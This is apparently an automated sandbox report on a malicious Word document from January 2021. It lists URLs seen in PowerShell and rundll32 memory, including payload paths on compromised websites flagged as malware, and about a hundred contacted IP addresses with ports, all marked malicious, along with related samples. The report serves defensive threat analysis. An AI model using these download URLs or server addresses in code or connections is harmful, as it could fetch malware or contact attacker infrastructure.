                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                		high
                                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://norailya.com/drupal/retAl/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://ocsp.entrust.net03powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://certificates.godaddy.com/repository/0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crl.usepowershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ummahstars.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.litespeedtech.compowershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpfalse
                                    		high
                                    https://hbprivileged.comhpowershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://hbprivileged.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://norailya.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://mrveggy.com/wp-admin/n/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://investor.msn.com/powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                      		high
                                      https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://r3.o.lencr.org0powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2125133029.0000000002820000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      https://www.teelekded.com/cgi-bin/LPo/powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://certificates.godaddy.com/repository/gdig2.crt0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                        		high
                                        http://ocsp.entrust.net0Dpowershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://cps.root-x1.letsencrypt.org0powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://r3.i.lencr.org/0%powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                          		high
                                          http://investor.msn.compowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                            		high
                                            http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                              		high
                                              https://ummahstars.com/app_old_may_2018/assets/wDL8x/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://cps.letsencrypt.org0powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://riandutra.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://certs.godaddy.com/repository/1301powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                		high
                                                https://certs.godaddy.com/repository/0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                                    		high
                                                    https://mrveggy.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://hbprivileged.com/cgi-bin/Qg/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://r3.o.lencr.opowershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpfalse
                                                            		high
                                                            http://crl.godaddy.com/gdig2s1-1814.crl0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.teelekded.com/cgi-bin/LPo/Ppowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://crl.godaddy.com/gdroot.crl0Fpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  https://secure.comodo.com/CPS0powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://calledtochange.orgpowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpfalse
                                                                      		high

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      200.75.39.254:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      192.175.111.212:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      191.6.196.95
                                                                      		unknownBrazil
                                                                      		28299IPV6InternetLtdaBRtrue
                                                                      91.233.197.70:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      93.149.120.214:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      212.71.237.140:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      93.146.143.191:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      75.103.81.81
                                                                      		unknownUnited States
                                                                      		14992CRYSTALTECHUStrue
                                                                      181.30.61.163:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      46.101.58.37:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      206.189.232.2:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      213.52.74.198:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      181.10.46.92:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      51.255.203.164
                                                                      		unknownFrance
                                                                      		16276OVHFRtrue
                                                                      191.223.36.170:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      83.169.21.32:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      186.177.174.163:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      70.32.84.74:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      217.13.106.14:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      138.97.60.141:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      111.67.12.221:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      201.185.69.28:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      45.16.226.117:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      51.15.7.145:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      82.208.146.142:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      1.226.84.243:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      84.232.229.24
                                                                      		unknownRomania
                                                                      		8708RCS-RDS73-75DrStaicoviciROtrue
                                                                      70.32.115.157:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      217.160.169.110:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      85.105.239.184:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      152.170.79.100:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      143.0.85.206:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      35.163.191.195
                                                                      		unknownUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      51.255.203.164:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      94.176.234.118:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      50.28.51.143:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      31.27.59.105:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      185.94.252.27:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.114.254.163:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      197.232.36.108:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.45.24.210:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      185.183.16.47:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.24.243.186:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.64.88.186:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      82.48.39.246:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      191.241.233.198:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      170.81.48.2:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      172.245.248.239:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      95.76.153.115:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      154.127.113.242:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      211.215.18.93:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      177.12.170.95
                                                                      		unknownBrazil
                                                                      		28299IPV6InternetLtdaBRtrue
                                                                      80.249.176.206:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      110.39.160.38:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      137.74.106.111:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      5.196.35.138:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      188.135.15.49:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      46.43.2.95:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      68.183.190.199:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      177.23.7.151:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      201.48.121.65:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      105.209.235.113:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      60.93.23.51:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      62.84.75.50:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.247.139.101:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      177.85.167.10:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      51.255.165.160:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      172.104.169.32:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      68.183.170.114:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      149.202.72.142:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      209.33.120.130:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      178.250.54.208:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      12.163.208.58:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      84.232.229.24:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      81.17.93.134:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      152.231.89.226:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      35.209.96.32
                                                                      		unknownUnited States
                                                                      		19527GOOGLE-2UStrue
                                                                      87.106.46.107:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      202.134.4.210:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      78.206.229.130:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      12.162.84.2:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.162.232.138:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      187.162.248.237:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      152.169.22.67:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      109.101.137.162:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      122.201.23.45:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      85.214.26.7:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      188.225.32.231:7080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      104.168.154.203
                                                                      		unknownUnited States
                                                                      		54290HOSTWINDSUStrue
                                                                      190.251.216.100:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      104.131.41.185:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      80.15.100.37:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      81.215.230.173:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      167.71.148.58:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      46.105.114.137:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      110.39.162.2:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      178.211.45.66:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      190.210.246.253:80
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      81.214.253.80:443
                                                                      		unknownunknown
                                                                      		unknownunknowntrue
                                                                      138.197.99.250:8080
                                                                      		unknownunknown
                                                                      		unknownunknowntrue

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:344894
                                                                      Start date:27.01.2021
                                                                      Start time:12:16:43
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 8m 21s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:ARCHIVOFile-20-012021.doc
                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                      Number of analysed new started processes analysed:20
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • GSI enabled (VBA)
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winDOC@32/14@6/100
                                                                      EGA Information:
                                                                      • Successful, ratio: 92.3%
                                                                      HDC Information:
                                                                      • Successful, ratio: 33.6% (good quality ratio 24.1%)
                                                                      • Quality average: 58.5%
                                                                      • Quality standard deviation: 37.9%
                                                                      HCA Information:
                                                                      • Successful, ratio: 86%
                                                                      • Number of executed functions: 33
                                                                      • Number of non-executed functions: 80
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .doc
                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                      • Found warning dialog
                                                                      • Click Ok
                                                                      • Attach to Office via COM
                                                                      • Scroll down
                                                                      • Close Viewer
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 192.35.177.64, 72.247.178.8, 72.247.178.41, 72.247.178.32, 72.247.178.26, 72.247.178.11, 72.247.178.35
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2552 because it is empty
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      12:17:36API Interceptor1x Sleep call for process: msg.exe modified
                                                                      12:17:36API Interceptor102x Sleep call for process: powershell.exe modified
                                                                      12:17:57API Interceptor181x Sleep call for process: rundll32.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      191.6.196.95FILE.docGet hashmaliciousBrowse
                                                                      • riandutra.com/email/AfhE8z0/
                                                                      Untitled_7367763-38724.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/YX1/
                                                                      INFO.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/YX1/
                                                                      https://linkprotect.cudasvc.com/url?a=http%3a%2f%2friandutra.com%2fimg%2fswift%2f&c=E,1,2psJaj0WYUreFyZdWnlur90KNLioLAx1BkUl9obC1u3x-EHkVe7qTOGX0uUvePAb3A6BZOxOQ0Z9cjx5tujIZQvH2mAi1DK43vdah5aWJaFPHjsgOX6aYGo0wcc,&typo=1THX,JenniferGet hashmaliciousBrowse
                                                                      • riandutra.com/img/swift/
                                                                      KmTYOvCPfr.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      aersUIITZI.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      AKnPzbr0F4.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      dacjlB7lAk.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      mKCRYKmKpO.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      wcHZ0mF90J.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      hhm95ov8un.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      K4ziGr614R.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      6sANi023oS.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      bIaql64CTa.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      Jyud0uPIRu.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      yH7WbTpvwU.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      p3QPprGcL9.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      3CEenXi4tj.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      cbdbiBCPkK.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/
                                                                      2Es3D1PlTF.docGet hashmaliciousBrowse
                                                                      • riandutra.com/img/yiZS/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      riandutra.comFILE.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      Untitled_7367763-38724.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      INFO.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      https://linkprotect.cudasvc.com/url?a=http%3a%2f%2friandutra.com%2fimg%2fswift%2f&c=E,1,2psJaj0WYUreFyZdWnlur90KNLioLAx1BkUl9obC1u3x-EHkVe7qTOGX0uUvePAb3A6BZOxOQ0Z9cjx5tujIZQvH2mAi1DK43vdah5aWJaFPHjsgOX6aYGo0wcc,&typo=1THX,JenniferGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      KmTYOvCPfr.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      aersUIITZI.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      AKnPzbr0F4.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      dacjlB7lAk.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      mKCRYKmKpO.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      wcHZ0mF90J.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      hhm95ov8un.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      K4ziGr614R.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      6sANi023oS.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      bIaql64CTa.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      Jyud0uPIRu.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      yH7WbTpvwU.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      p3QPprGcL9.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      3CEenXi4tj.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      cbdbiBCPkK.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      2Es3D1PlTF.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      mrveggy.comhttps://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/Get hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      KmTYOvCPfr.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      aersUIITZI.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      AKnPzbr0F4.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      dacjlB7lAk.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      mKCRYKmKpO.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      wcHZ0mF90J.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      hhm95ov8un.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      K4ziGr614R.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      6sANi023oS.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
                                                                      bIaql64CTa.docGet hashmaliciousBrowse
                                                                      • 191.6.198.191
